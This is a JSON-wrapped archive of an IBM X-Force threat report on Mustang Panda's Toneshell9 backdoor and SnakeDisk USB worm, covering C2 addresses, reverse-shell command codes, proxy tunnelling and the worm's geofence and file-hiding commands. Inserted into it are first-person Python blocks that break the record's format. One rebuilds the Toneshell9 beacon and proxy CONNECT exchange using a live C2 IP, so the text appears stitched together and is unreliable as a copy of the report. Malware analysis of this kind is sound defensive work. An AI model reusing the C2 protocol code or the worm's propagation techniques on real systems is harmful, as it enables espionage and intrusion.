{
	"id": "41f40459-2d7d-4e5e-9ee9-72a4e6ebefd5",
	"created_at": "2026-04-06T00:08:34.925077Z",
	"updated_at": "2026-04-10T13:11:30.041899Z",
	"deleted_at": null,
	"sha1_hash": "37cd3681fbd8728979cff325ff205b4378d460c4",
	"title": "Hive0154, aka Mustang Panda, drops updated Toneshell backdoor and novel SnakeDisk USB worm",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2694339,
	"plain_text": "Hive0154, aka Mustang Panda, drops updated Toneshell backdoor\r\nand novel SnakeDisk USB worm\r\nBy Golo Mühr, Joshua Chung\r\nPublished: 2025-09-11 · Archived: 2026-04-05 15:14:14 UTC\r\nJoshua Chung\r\nCyber Threat Intelligence Analyst\r\nIBM Security\r\nIn July 2025, IBM X-Force discovered new malware attributed to China-aligned threat actor Hive0154. This\r\nincludes an updated Toneshell variant evading detections and supporting several new features, as well as a novel\r\nUSB worm called SnakeDisk discovered in mid-August. The worm only executes on devices with Thailand-based\r\nIP addresses and drops the Yokai backdoor, discovered by Netskope in December 2024.\r\nKey findings\r\nThroughout mid-2025, X-Force observed several Toneshell and Pubload malware variants in weaponized\r\narchives mostly uploaded from Singapore and Thailand.\r\nOne of the variants evading VirusTotal detections is the latest update \"Toneshell9\". It supports command\r\nand control (C2) communication through locally configured proxies to blend in with enterprise network\r\ntraffic and facilitates two reverse shells in parallel.\r\nX-Force analyzed a new USB worm, SnakeDisk, which only executes on devices located in Thailand,\r\nbased on their IP address. The worm displays code overlaps with Tonedisk and is able to detect new and\r\nexisting USB devices, which it weaponizes as a means of propagation.\r\nThe analyzed SnakeDisk sample drops the Yokai backdoor on infected devices, which sets up a reverse\r\nshell allowing operators to execute arbitrary commands. Yokai was previously tied to campaigns targeting\r\nThai officials in December 2024.\r\nBackground\r\nHive0154 is a well-established China-aligned threat actor with a large malware arsenal, consistent techniques, and\r\nwell-documented activity over the past several years. 
The group consists of multiple subclusters and engages in\r\ncyberattacks targeting public and private organizations, including think tanks, policy groups, government\r\nagencies, and individuals. X-Force's observation of the group's use of multiple custom malware loaders,\r\nbackdoors, and USB worm families showcases its advanced development capabilities. Hive0154 activity\r\noverlaps with threat actors publicly reported as Mustang Panda, Stately Taurus, Camaro Dragon, Twill Typhoon,\r\nPolaris, and Earth Preta.\r\nCyber espionage targeting East Asia\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 1 of 29\n\nThroughout mid-2025, X-Force observed several weaponized archives uploaded to VirusTotal from Singapore and\r\nThailand:\r\nFilename | Malicious DLL | C2 server | Date\r\nMeeting Venue Request Information.zip | Loader injecting Pubload shellcode | 188.208.141[.]196:443 | May 21\r\nHotel Booking Request.7z | Toneshell8 | 146.70.29[.]229:443 | July 03\r\nCyber_Safety_Checklist_2025.rar | Toneshell8 | 146.70.29[.]229:443 | July 30\r\nTNLA နှင့် အခြားတော်လှန်ရေးအင်အားစုများ.rar (translated from Burmese: \"TNLA and other revolutionary forces\") | Toneshell8 | 146.70.29[.]229:443 | July 30\r\nScan(08-02-205).zip | Toneshell8 | 146.70.29[.]229:443 | August 05\r\nNotes.rar | Loader injecting Pubload shellcode | 188.208.141[.]196:443 | August 21\r\nCallNotes.zip | Loader injecting Toneshell7 shellcode | 146.70.29[.]229:443 | September 04\r\nHive0154 was observed using a new loader to reflectively inject either Pubload or Toneshell7, as well as directly\r\ndeploying the more obfuscated Toneshell8 variant. 
The most recent Pubload variant has undergone minor changes\r\nand now supports decoy C2 servers and downloading shellcode payloads via HTTP POST in addition to raw TCP\r\nimitating TLS traffic.\r\nThe archive \"CallNotes.zip\" discovered in September was downloaded from Box Cloud Storage through a link in\r\na PDF lure impersonating the Myanmar Ministry of Foreign Affairs:\r\nFig. 1: PDF containing download link for weaponized archive deploying Toneshell7\r\nIn mid-August, X-Force also discovered SnakeDisk, a new USB worm sharing overlap with previous Tonedisk\r\nvariants. The worm only executes on devices located in Thailand as determined by their public IP address.\r\nSnakeDisk distributes the Yokai backdoor, which was publicly linked to several other Thailand-targeted\r\ncampaigns by Netskope in December 2024.\r\nGiven the previous history of the Yokai backdoor being used against Thailand, the discovery of the latest USB worm\r\nappears to coincide with recent geopolitical events surrounding Thailand:\r\nIn late May 2025, Thailand and Cambodia were involved in a border skirmish that resulted in the death of\r\na Cambodian soldier. Subsequent talks between Thailand and Cambodia broke down, with each side\r\nreinforcing troops along the border.\r\nIn June 2025, a phone call between Thailand's prime minister, Paetongtarn Shinawatra, and former\r\nCambodian leader Hun Sen was leaked, resulting in the removal of the Thai prime minister.\r\nOn July 24, 2025, multiple border clashes between Thailand and Cambodia ensued, including the use of\r\nartillery, airstrikes, and naval bombardments. 
On July 28, 2025, both sides reached a tentative truce,\r\nbrokered by the US and Malaysia.\r\nIn early August 2025, the Cambodian government accused the Thai military of planning an assassination strike\r\nagainst the Cambodian prime minister, which the Thai government denied. The Cambodian government cited\r\n'unnamed foreign intelligence' as its source.\r\nTraditionally, the People's Republic of China (PRC) has been a benefactor to Cambodia, supplying weapons and\r\ninvesting billions in infrastructure projects. Recent geopolitical events may have provided the impetus for Hive0154\r\nto conduct operations against Thailand. The deployment of the SnakeDisk USB worm, configured to only\r\nexecute on Thailand-based machines, suggests that Hive0154 may be seeking to penetrate air-gapped\r\nsystems, often employed in government networks.\r\nToneshell8 updates (March 2025)\r\nX-Force first observed Toneshell version 8 in March 2025. It is very similar in behavior to the previous version 7,\r\nbut contains minor updates to evade static detection and hinder analysis. The most visible change is the inclusion\r\nof junk code within the malware's functions. These junk code sections implement the following behavior:\r\nUse API calls to write random temporary files and delete them again\r\nCopy and loop through a string. The strings used in the initial samples were copied from OpenAI's\r\nChatGPT website\r\nSleep for random intervals\r\nThese three code examples can be found, for instance, in the function resolving all of the APIs:\r\nFig. 2: Random sleep junk code\r\nFig. 3: Random file created and deleted in junk code\r\nFig. 4: Useless string scanning in junk code\r\nToneshell8 developers also chose to replace the Pseudo Random Number Generator (PRNG) with a custom Linear\r\nCongruential Generator (LCG) implementation using different constants, for example:\r\nDWORD __cdecl zf_update_prng(main_struct *main_struct)\r\n{\r\n    main_struct-\u003eprng_state = 0xBD828 * main_struct-\u003eprng_state + 0x4373A;\r\n    return main_struct-\u003eprng_state;\r\n}\r\nThe PRNGs are used in Toneshell to generate a victim ID, C2 traffic encryption keys, and verify C2 beacon\r\nauthenticity. The implementations in Toneshell8 samples vary greatly in quality. The generator above, for instance,\r\nis used by the four Toneshell8 samples listed above and only produces 11 different states for most seeds: because the\r\nmultiplier 0xBD828 is divisible by 8, the seed's contribution to the 32-bit state vanishes within 11 updates and every\r\nseed converges to the same fixed point, so anything derived from more than a dozen successive outputs is\r\neffectively constant. \r\nLastly, the hardcoded response codes sent to the C2 server, which notify operators of the status of certain\r\ncommands, are now obfuscated by calculating them from different hardcoded integers in the sample. \r\nToneshell9 (July 2025)\r\nIn July, X-Force discovered a new Toneshell variant, which we will refer to as Toneshell9. It contains significant\r\nupdates and did not have any detections on VirusTotal at the time of writing\r\n(318a1ebc0692d1d012d20d306d6634b196cc387b1f4bc38f97dd437f117c7e20). \r\nThe new Toneshell variant was first observed in trojanized RAR archives containing \"USB Safely Remove\"\r\nsoftware. The code structure appears to be based on a forked variant from December 2024, which contains\r\nan identical C2 configuration.\r\nInitialization\r\nSimilar to previous variants, Toneshell9 is executed as a sideloaded DLL. 
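Before following Toneshell9 further, the Toneshell8 generator above is worth running. The following is an added example, my own Python rather than code from the malware or the IBM report: it reimplements zf_update_prng with the constants shown above in 32-bit DWORD arithmetic and walks the generator from a seed until its output stops changing. The seeds and the derive_victim_id helper (an ID built from the low byte of successive outputs) are assumptions for illustration; the report says only that the generator feeds victim IDs and keys.

```python
# Added example: the Toneshell8 LCG constants from zf_update_prng above, reimplemented in
# 32-bit (DWORD) arithmetic to show how quickly the generator collapses. Illustrative code,
# not taken from the malware or the IBM report.
MASK32 = 0xFFFFFFFF
LCG_A = 0xBD828   # multiplier in zf_update_prng
LCG_C = 0x4373A   # increment in zf_update_prng

def zf_update_prng(state):
    '''One update of the Toneshell8 generator: state = a * state + c (mod 2**32).'''
    return (LCG_A * state + LCG_C) & MASK32

def orbit(seed, limit=64):
    '''States visited from seed until the generator stops changing (at most limit updates).'''
    states = [seed & MASK32]
    for _ in range(limit):
        nxt = zf_update_prng(states[-1])
        if nxt == states[-1]:
            break
        states.append(nxt)
    return states

def steps_to_fixed_point(seed):
    '''Number of updates after which the output no longer changes for this seed.'''
    return len(orbit(seed)) - 1

def fixed_point():
    '''The unique x with x == a*x + c (mod 2**32); 1 - a is odd, so it is invertible mod 2**32.'''
    inv = pow((1 - LCG_A) & MASK32, -1, 1 << 32)
    return (LCG_C * inv) & MASK32

def derive_victim_id(seed, nbytes=16):
    '''Assumption for illustration only: an ID built from the low byte of successive outputs,
    one plausible way a 16-byte victim ID could be drawn from such a generator.'''
    state = seed
    out = bytearray()
    for _ in range(nbytes):
        state = zf_update_prng(state)
        out.append(state & 0xFF)
    return bytes(out)

if __name__ == '__main__':
    for seed in (1, 0x1234, 0xDEADBEEF):
        print(hex(seed), steps_to_fixed_point(seed), hex(orbit(seed)[-1]))
    # The tail of every derived ID is identical because the generator has already settled.
    print(derive_victim_id(1).hex(), derive_victim_id(2).hex())
```

Since 0xBD828 equals 2^3 times an odd number, the 11th power of the multiplier is divisible by 2^33 and is therefore 0 modulo 2^32, which is why no seed survives more than 11 updates; the same arithmetic lets an analyst who has one beacon predict every later key the sample will produce.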
The weaponized RAR archive contains\r\na BAT file, launching a legitimate executable \"USBSRService.exe\" with a \"-Embedding\" command line argument.\r\nOnce the Toneshell DLL \"EasyFuncs.dll\" is loaded into memory and the export FS_RegActiveX is executed, it\r\nbegins by resolving a first set of APIs needed for initialization. After parsing the \"-Embedding\" command line\r\nargument, Toneshell launches its parent executable in a new process with the argument \"EvtSys\". The latter\r\nargument triggers the malicious DLL's main behavior. \r\nToneshell begins by initializing a new client object holding the following values:\r\nstruct TONESHELL_CLIENT {\r\n    BYTE is_connected;\r\n    HANDLE heartbeat_thread;\r\n    C2_CLIENT *p_c2_client;\r\n    DWORD unused_C;\r\n    VICTIM_DATA *p_victim_data;\r\n    DWORD unused_14;\r\n    QWORD tick_count;\r\n};\r\nIt then goes on to resolve the rest of its necessary APIs via a custom hashing function and stores the function\r\npointers in a separate struct. Next, it creates a new event \"Windows External Module\", which acts as a mutex to\r\nprevent multiple instances from running on the same machine. \r\nToneshell9 is littered with several sections of junk code, which retrieve the current number of CPU ticks, store\r\nthe result as a string and deallocate it again. \r\nFig. 5: Toneshell9 junk code within API resolving logic\r\nTo manage and store C2 communication, proxy servers, beacons, and payloads in memory, Toneshell instantiates a\r\nlarge 129KB object:\r\nstruct C2_CLIENT {\r\n    std::vector\u003cstd::string\u003e c2_list;\r\n    SOCKADDR_IN c2_sockaddr_array[16];\r\n    int current_c2_sockaddr_index;\r\n    int number_of_c2s;\r\n    BYTE key[768];\r\n    SOCKET ptr_socket;\r\n    DWORD beacon_tls_header;\r\n    BYTE beacon_payload_buffer[65536];\r\n    BYTE c2_response_buffer[65536];\r\n    DWORD size_of_c2_response;\r\n    BYTE critical_section[24];\r\n    std::list\u003cproxy_entry\u003e proxy_list;\r\n    int proxy_enabled;\r\n    int current_c2_string_index;\r\n};\r\nUnlike previous variants, Toneshell9 enumerates the HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER\r\nand HKEY_USERS\\\\.DEFAULT registry hives to search for locally configured proxy servers. \r\nFig. 6: Toneshell9 parsing proxy servers from the Windows registry\r\nIf a server is found, both the URL's protocol (http, https, ftp, or socks) and the full URL are stored as strings in a\r\nlist of objects. \r\nNext, Toneshell stores its C2 server domain and IP address in a vector of strings. The same hardcoded IP and port\r\nare directly stored in an array of SOCKADDR_IN structures. The malware then loops through the C2 server\r\nstrings, resolving the IP address for each of them and adding it into the same array of SOCKADDR_IN structures.\r\nFig. 7: Toneshell resolving and storing C2 server addresses\r\nAs observed in previous variants, Toneshell proceeds to drop a file containing a random 16-byte victim GUID\r\ngenerated via the Windows _rand() function:\r\nC:\\ProgramData\\ProgrammaticallyCpp.inc\r\nThe GUID is also stored in a struct together with the path of the file and the victim's NetBIOS name. \r\nstruct VICTIM_DATA {\r\n    BYTE victim_guid[16];\r\n    BYTE computername[24];\r\n    BYTE guid_path[24];\r\n};\r\nThe data above is used to construct a beacon object in memory. Notably, Toneshell9 performs calculations on the\r\ndifference in the CPU's tick count before and after the main initialization behavior detailed above. This value is\r\nnormalized, and likely used to detect anomalies in execution time which could indicate a delayed sandbox\r\nexecution or debugging. \r\nstruct BEACON_DATA {\r\n    BYTE key[768];\r\n    BYTE code_byte;          // set to 0x02\r\n    BYTE victim_guid[16];\r\n    BYTE computername[80];\r\n    DWORD tick_delta;\r\n};\r\nThe 0x300-byte XOR key is generated via _rand() and used to encrypt the 101 bytes of data starting at offset\r\n0x300. The data above is packaged into a fake TLS 1.2 Application Data packet of the following format:\r\nstruct BEACON {\r\n    BYTE tls_header[3];      // 17 03 03\r\n    WORD payload_size;       // 0x0365 (big-endian)\r\n    BYTE payload_data[869];\r\n};\r\nC2 communication and HTTP proxy\r\nDuring the main loop Toneshell9 executes a function to establish a socket connection to its C2 server. It begins by\r\nattempting to connect via the first SOCKADDR_IN structure. If that fails, the malware tries to set up a socket\r\nconnection through any of the proxy servers collected from the registry. This is attempted for each of the C2\r\naddress strings, i.e. the IP address and domain for the sample analyzed above. \r\nAfter resolving the IP address of the proxy server and connecting via a TCP socket, it first sets the send and\r\nreceive timeouts to 1 minute. Next, it sends the following CONNECT request: \r\nCONNECT \u003cC2 server\u003e:\u003cC2 port\u003e HTTP/1.0\r\nHost: \u003cC2 server\u003e:\u003cC2 port\u003e\r\nContent-Length: 0\r\nProxy-Connection: Keep-Alive\r\nPragma: no-cache\r\nIf the proxy server returns a 2xx status code, the connection has been established successfully and is ready for raw\r\nTCP tunneling. To verify the connection with its C2 server, Toneshell9 uses a short handshake protocol, also\r\ntransmitting the server's IP and port in the process. If the handshake is successful, the handle to the socket is stored\r\nin the C2_CLIENT struct and the socket timeouts are set to 2 minutes. Toneshell then sends the first\r\nadvertisement beacon through the socket. \r\nIt expects a similar response back from its server, which apart from the first 5 bytes is encrypted via the previously\r\ntransmitted XOR key:\r\nstruct C2_RESPONSE {\r\n    BYTE tls_header[3];      // 17 03 03\r\n    WORD payload_size;       // big-endian\r\n    BYTE command_code;\r\n    BYTE shell_id;\r\n    BYTE data[];\r\n};\r\nBy using a proxy already configured on an infected device, Toneshell can effectively blend in with other network\r\ntraffic. Larger enterprise environments often enforce egress filtering, only allowing traffic through trusted\r\ngateways, which would block direct C2 communication. Toneshell's added capability of circumventing this\r\nfiltering allows it to operate within well-secured network environments. The proxy route also leaves a different\r\ntrail: the CONNECT shown above appears in the proxy's own logs as an HTTP/1.0 tunnel request on port 443 that\r\ncarries no User-Agent header, which is a useful hunting pivot in environments where browsers are the only\r\nexpected tunnel clients.\r\nReverse shell\r\nUpon receiving the first C2 response, Toneshell starts a new thread that sends heartbeat-like response beacons\r\nevery 30 seconds, with the 0x1 response code and a random shell_id value. 
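The proxy handshake and the beacon exchange described in this section, as an added example in Python (my own code, not Toneshell9's and not from the IBM report): the CONNECT request, the check of the proxy's status line, the fake TLS 1.2 Application Data beacon assembled from the BEACON_DATA fields, and the decoding of a C2_RESPONSE. The report does not state how the 768-byte key is applied to the 101 data bytes or to the response body, so the example assumes byte i is XORed with key[i mod 768], stores tick_delta little-endian, and uses a constructed key, GUID, host name and server reply.

```python
# Added example: client side of the Toneshell9 proxy/beacon sequence. Illustrative code, not the
# malware's; key indexing and tick_delta byte order are assumptions, sample values are constructed.
import struct

CRLF = chr(13) + chr(10)
TLS_APPDATA_HEADER = bytes([0x17, 0x03, 0x03])   # TLS 1.2 Application Data record header
KEY_LEN = 0x300                                   # 768-byte XOR key sent in the clear
DATA_LEN = 1 + 16 + 80 + 4                        # code_byte + victim_guid + computername + tick_delta
PAYLOAD_LEN = KEY_LEN + DATA_LEN                  # 0x365 = 869

def build_connect_request(c2_host, c2_port):
    '''The CONNECT request Toneshell9 sends through a proxy found in the registry.'''
    target = c2_host + ':' + str(c2_port)
    lines = ['CONNECT ' + target + ' HTTP/1.0', 'Host: ' + target, 'Content-Length: 0',
             'Proxy-Connection: Keep-Alive', 'Pragma: no-cache']
    return (CRLF.join(lines) + CRLF + CRLF).encode()

def proxy_accepted(response):
    '''True if the proxy answered the CONNECT with a 2xx status line.'''
    status_line = response.split(CRLF.encode(), 1)[0].decode(errors='replace')
    parts = status_line.split(' ')
    return len(parts) >= 2 and parts[0].startswith('HTTP/') and parts[1].startswith('2')

def xor_with_key(data, key):
    '''Assumption: byte i of the data is XORed with key[i mod len(key)].'''
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def build_beacon(key, victim_guid, computername, tick_delta):
    '''BEACON_DATA packed into the fake TLS record: key in clear, the 101 data bytes XORed.'''
    assert len(key) == KEY_LEN and len(victim_guid) == 16
    name = computername.encode()
    name = name + bytes(80 - len(name))            # zero-pad to the 80-byte field
    data = bytes([0x02]) + victim_guid + name + struct.pack('<I', tick_delta & 0xFFFFFFFF)
    payload = key + xor_with_key(data, key)
    return TLS_APPDATA_HEADER + struct.pack('>H', len(payload)) + payload

def parse_beacon(packet):
    '''Recover the beacon fields, or None if the packet does not have the expected shape.'''
    if len(packet) != 5 + PAYLOAD_LEN or packet[:3] != TLS_APPDATA_HEADER:
        return None
    if struct.unpack('>H', packet[3:5])[0] != PAYLOAD_LEN:
        return None
    key = packet[5:5 + KEY_LEN]
    data = xor_with_key(packet[5 + KEY_LEN:], key)
    if data[0] != 0x02:
        return None
    return {'key': key,
            'victim_guid': data[1:17],
            'computername': data[17:97].rstrip(bytes(1)).decode(errors='replace'),
            'tick_delta': struct.unpack('<I', data[97:101])[0]}

def build_c2_response(key, command_code, shell_id, data):
    '''Constructed server side of the exchange, used to exercise parse_c2_response.'''
    body = xor_with_key(bytes([command_code, shell_id]) + data, key)
    return TLS_APPDATA_HEADER + struct.pack('>H', len(body)) + body

def parse_c2_response(packet, key):
    '''Decode a C2_RESPONSE: 5 clear bytes, then command_code, shell_id and data under the key.'''
    if len(packet) < 7 or packet[:3] != TLS_APPDATA_HEADER:
        return None
    size = struct.unpack('>H', packet[3:5])[0]
    body = xor_with_key(packet[5:5 + size], key)
    if len(body) < 2:
        return None
    return {'command_code': body[0], 'shell_id': body[1], 'data': body[2:]}

# Constructed sample values, not taken from a real infection.
SAMPLE_KEY = bytes((i * 7 + 3) & 0xFF for i in range(KEY_LEN))
SAMPLE_GUID = bytes(range(16))

if __name__ == '__main__':
    print(build_connect_request('146.70.29.229', 443).decode())
    print(proxy_accepted(b'HTTP/1.0 200 Connection established' + CRLF.encode() + CRLF.encode()))
    beacon = build_beacon(SAMPLE_KEY, SAMPLE_GUID, 'DESKTOP-TEST', 1234)
    print(len(beacon), parse_beacon(beacon)['computername'])
    reply = build_c2_response(SAMPLE_KEY, 3, 1, b'')
    print(parse_c2_response(reply, SAMPLE_KEY))
```

For detection, the shape check in parse_beacon is the part worth porting to a sensor: an Application Data record of length 0x0365 arriving as the first TLS-looking bytes on a connection that never carried a ClientHello cannot be produced by a real TLS stack, because the malware only imitates TLS over raw TCP.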
Response beacons have a very similar\r\nformat:\r\nstruct BEACON_CMD_RESPONSE {\r\n    BYTE tls_header[3];      // 17 03 03\r\n    WORD payload_size;       // big-endian\r\n    BYTE response_code;\r\n    BYTE shell_id;\r\n    BYTE data[];\r\n};\r\nToneshell9 supports the following command codes:\r\nCode | Description\r\n2 | Skip this beacon and wait for the next one to handle.\r\n3 | Create a new reverse shell and assign it to the shell_id.\r\n4 | Write a command string to the reverse shell identified by the shell_id.\r\n5 | Close the reverse shell identified by the shell_id.\r\nSimilar to previous variants, a reverse shell is set up using anonymous pipes connected to the stdin and stdout handles\r\nof a new cmd.exe process. Toneshell9 supports two active reverse shells in parallel and uses the structure below to\r\nmanage a shell connection:\r\nstruct REVERSE_SHELL {\r\n    int shell_id;\r\n    BYTE cmd_path[24];\r\n    HANDLE hReadPipe1;\r\n    HANDLE hWritePipe1;\r\n    HANDLE hReadPipe2;\r\n    HANDLE hWritePipe2;\r\n    DWORD hThread_cmd;\r\n    DWORD hProcess_cmd;\r\n    DWORD parent_pid;\r\n    BYTE cmd_process_created;\r\n    DWORD hThread_pipe_to_c2;\r\n};\r\nFor each reverse shell, a new thread is created to regularly check for new data from the stdout pipe and send it\r\nback to the C2 server in a beacon with response code 0x4. Toneshell operators can write string data to the pipe\r\nusing the correct shell_id and execute arbitrary commands on the machine. When closing a reverse shell, the\r\nconhost.exe process identified by the parent_pid is also terminated on the machine. \r\nSnakeDisk USB worm\r\nIn August 2025, X-Force discovered a previously unknown USB worm which was attributed to Hive0154. The 32-bit\r\nDLL was uploaded to VirusTotal as \"01.dat\" from Thailand and displays similar features to Toneshell9. 
Both\r\nare executed via DLL sideloading, with all exports except for the DllEntryPoint and the malware's entry point\r\npointing to the same function, which immediately returns. They also both feature nearly identical API resolution\r\nmechanisms, which is consistent with almost all Toneshell-related malware. Similar to the Toneshell9 sample,\r\nSnakeDisk also reads a command-line argument to select one of two possible execution paths:\r\n\"-Embedding\": starts the USB infection behavior before dropping and executing the embedded payload\r\nonce a device is removed.\r\n\"-hope\": immediately drops and executes the embedded payload.\r\nInitialization\r\nIn order to execute the USB infection functionality, SnakeDisk requires a configuration file, which it searches for\r\nin the parent executable's current directory. Any files found in that directory, unless they are named \"System\r\nVolume Information\", will be added to a list of potential configuration files. SnakeDisk goes on to open and read\r\neach file, testing the following conditions to verify the file before proceeding with the decryption:\r\nFile size is between 0x14A and 0x14000 bytes\r\nThe first 4 bytes are the correct CRC32 checksum of the rest of the file\r\nSnakeDisk proceeds by decrypting the data using a likely custom 2-phase XOR algorithm and a 320-byte key\r\nstored in a 330-byte header. \r\nFig. 8: XOR-based configuration decryption algorithm\r\nFinally, the malware parses 18 string values that define the configuration of the malware. 
X-Force was unable to\r\nrecover a configuration file; however, analysis of SnakeDisk revealed the following likely purposes of the values.\r\nConfiguration field | Purpose\r\nversion | Malware version used to determine if an already infected client should be reinfected with an updated variant.\r\nmutx | Mutex string.\r\npsd | Not used in the analyzed sample. Possibly the local equivalent of \"usd\"; all \"u*\" values are file/directory names on the USB after weaponization.\r\nurd | Possibly \"USB root directory\". Directory name created on the USB which contains the subdirectories below.\r\nuud | Possibly \"USB user directory\". Directory name under \u003curd\u003e which contains the user's original files from the USB.\r\nusd | Possibly \"USB staging directory\". Directory name under \u003curd\u003e storing various malicious components of SnakeDisk.\r\npnex | Possibly \"parent name executable\". Filename of a file existing in SnakeDisk's current directory during execution.\r\npndl | Possibly \"parent name DLL\". Filename of a file existing in SnakeDisk's current directory during execution.\r\npnen | Possibly \"parent name encrypted\". Filename of a file existing in SnakeDisk's current directory during execution.\r\npnendl | Possibly \"parent name encrypted DLL\". Filename of a file existing in SnakeDisk's current directory during execution.\r\nunex | Possibly \"USB name executable\". Filename of a file copied from \u003cpnex\u003e to the USB.\r\nundl | Possibly \"USB name DLL\". Filename of a file copied from \u003cpndl\u003e to the USB.\r\nunen | Possibly \"USB name encrypted\". Filename of a file copied from \u003cpnen\u003e to the USB.\r\nunendl | Possibly \"USB name encrypted DLL\". Filename of a file copied from \u003cpnendl\u003e to the USB.\r\nunendl_org | Filename of a (likely DLL) file copied from \u003cpnendl\u003e to the USB's root directory and hidden via file attributes.\r\nunconf | Filename of the SnakeDisk config dropped to the USB.\r\nregkey | Potentially relates to a registry persistence mechanism. Not used in the analyzed sample.\r\nschkey | Potentially relates to a scheduled task persistence mechanism. Not used in the analyzed sample.\r\nAfter successfully reading its configuration file, SnakeDisk will try to confirm that it is currently executing on a\r\nThailand-based machine. It sends an HTTP GET request to http://ipinfo[.]io/json and checks if the \"country\" field\r\nmatches either \"THA\" or \"TH\". If that is true, execution continues.\r\nGET /json HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Program/1.0\r\nHost: ipinfo.io\r\nNotably, execution will also continue if an error occurs while resolving APIs or during network communication, so\r\nthe geofence fails open: a host that is offline, egress-filtered or sandboxed without internet access is treated as if it\r\nwere in Thailand, and only a successful lookup that returns another country stops the worm. \r\nSnakeDisk then ensures it only runs in a single instance by attempting to open a mutex \"Global\\\\\u003cmutx config\r\nvalue\u003e\". If the mutex already exists, the malware exits; otherwise, it creates the mutex via CreateMutexW.\r\nUSB device detection\r\nIn order to infect any already connected USB drives, SnakeDisk begins by looping through all possible drive letters\r\nfrom A to Z. It opens a handle to the volume, such as \"\\\\.\\A:\", and sends the IO control code\r\nIOCTL_STORAGE_GET_HOTPLUG_INFO (0x2D0C14) to the device. If the device is a hotplug device\r\naccording to the returned STORAGE_HOTPLUG_INFO struct, it launches a new thread to infect that drive. \r\nAfter going through all drive letters, SnakeDisk sleeps for 5 seconds and then registers a new window class\r\n\"TestClassName\" and creates a corresponding window \"TestWindowName\". 
In order to retrieve messages from\r\nthe operating system, the function creates a Windows message loop using GetMessageW and dispatches the\r\nmessages to the malware's window procedure via TranslateMessage and DispatchMessageW. It only exits the loop\r\nwhen receiving a WM_CAP_PAL_OPEN (0x450) message. The malicious window class references a custom\r\nprocedure which listens for the WM_DEVICECHANGE (0x219) message, and specifically the\r\nDBT_DEVICEARRIVAL (0x8000) and DBT_DEVICEREMOVECOMPLETE (0x8004) events. \r\nFig. 9: Window class callback function listening for WM_DEVICECHANGE messages\r\nIf such a message is received, for instance when a USB device is plugged into the infected machine, the function\r\nuses the \"dbcv_unitmask\" field of the DEV_BROADCAST_VOLUME structure to determine the drive letter of\r\nthe corresponding device. For newly connected devices, a new thread is launched to infect the drive. If SnakeDisk\r\ndetects a device removal, it starts a thread to drop and execute its embedded payload, the same execution path\r\nthat launching the SnakeDisk DLL with the \"-hope\" command line argument takes. \r\nUSB propagation\r\nThe thread to infect a detected USB device begins by searching the drive for an existing config file to determine if\r\nit was already infected. It attempts to decrypt and parse a configuration from any file with a .dat or .cd extension.\r\nIf a configuration is parsed, the malware compares the version number of the already infected drive to the version\r\nof its own configuration and will only reinfect drives with older versions of SnakeDisk on them. \r\nSnakeDisk then launches another thread to move the existing files on the USB into a new subdirectory. 
By\r\nessentially hiding the files a user expects on their USB, the malware increases the chance of a victim believing the\r\nUSB has not yet been opened and accidentally clicking the weaponized executable, which bears the same name as\r\nthe device, on a new machine. After execution, the malicious launcher would copy back the user's files to avoid any\r\nsuspicion. The path containing the user's data on an infected device is built from the configuration values as:\r\n\u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cuud\u003e\\\r\nThe malware may use two different mechanisms for the operation, each launched in its own thread. The\r\nfirst uses SHFileOperationW to move each file, and during every operation also reads 32 bytes from a file\r\n\"C:\\\\Windows\\\\Tmp\\\\msd.log\", which are written to a file \"C:\\\\ProgramData\\\\app.log\" before deleting the latter.\r\nThe purpose of this behavior is unclear. \r\nFig. 10: Moving files from the USB into a new directory\r\nWhile the thread runs, the malware regularly checks for successful completion for 30 seconds before launching a\r\nsecond thread. The second thread uses robocopy to move the files and executes the following command in a new\r\nprocess:\r\nrobocopy \u003cdrive_letter\u003e:\\ \u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cuud\u003e\\ /XD \"\u003cdrive_letter\u003e:\\\u003curd\u003e\\\" /XF \"\u003cdrive_letter\u003e:\\\u003cunendl_org\u003e\" /XF \"\u003cdrive_letter\u003e:\\\u003cusb_volumename\u003e.exe\" /XD \"System Volume Information\" /E /MOVE\r\nBoth file movements exclude SnakeDisk's weaponized files and the \"System Volume Information\" directory, which\r\nremain in the USB disk's root directory. 
After running the command above, the same command is launched\r\nagain with two additional flags, \"/IS\" and \"/XO\", to include files that are identical on both sides and exclude source\r\nfiles older than their destination copy. \r\nAfter moving the existing files on the USB, SnakeDisk goes on to copy its own payloads from its current\r\ndirectory to the USB drive. The following files, as specified in the configuration, are copied via CopyFileW, each\r\nin a new thread:\r\n.\\\u003cpnex\u003e copied to \u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cusd\u003e\\\u003cunex\u003e\r\n.\\\u003cpndl\u003e copied to \u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cusd\u003e\\\u003cundl\u003e\r\n.\\\u003cpnen\u003e copied to \u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cusd\u003e\\\u003cunen\u003e\r\n.\\\u003cpnendl\u003e copied to \u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cusd\u003e\\\u003cunendl\u003e\r\n.\\\u003cpnen\u003e copied to \u003cdrive_letter\u003e:\\\u003cusb_volumename\u003e.exe\r\n.\\\u003cpnendl\u003e copied to \u003cdrive_letter\u003e:\\\u003cunendl_org\u003e\r\nThe EXE's file name in the root of the USB drive is set to the volume name of the USB device, or just \"USB.exe\"\r\nif it is empty. SnakeDisk also sets the attributes SYSTEM and HIDDEN on the file copied to\r\n\"\u003cdrive_letter\u003e:\\\u003cunendl_org\u003e\". All directories on the USB carry those attributes as well, effectively hiding everything apart from\r\nthe executable. Although X-Force did not retrieve any of the other files, previous USB worms used the same\r\ntechnique to lure victims into clicking the executable, which would sideload a DLL to initiate the infection. That\r\nmalicious DLL's filename is likely stored in the \"unendl_org\" configuration value. Lastly, SnakeDisk writes its\r\nconfiguration to a new file on the USB with the name from the \"unconf\" value. 
